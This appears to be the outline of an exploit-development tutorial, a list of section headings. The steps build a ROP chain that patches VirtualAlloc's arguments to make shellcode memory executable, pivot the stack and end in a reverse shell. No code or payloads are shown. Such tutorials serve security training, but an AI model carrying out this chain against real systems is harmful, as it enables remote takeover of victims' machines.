Patch lpAddress with Shellcode Address

Patching dwSize

Align ESI to dwSize placeholder

Patching dwSize with Calculated Value

Patching flAllocationType

The Limitation of Negation Technique

Align ESI to flAllocationType Placeholder

Calculate Value 0x1000 via Addition

Patch flAllocationType with Calculated Value

Patching flProtect

Align ESI to flProtect Placeholder

Calculate Value 0x40 via Addition

Patch flProtect with Calculated Value

Summary of Patched

Return to VirtualAlloc

Calculate the Offset to VirtualAlloc

Executing the Stack Pivot

Verifying Memory Protection

Getting a Reverse Shell

Verifying the Jump to Shellcode

Expanding the Buffer for the Reverse Shell

Generating Shellcode

Full Chain and Reverse Shell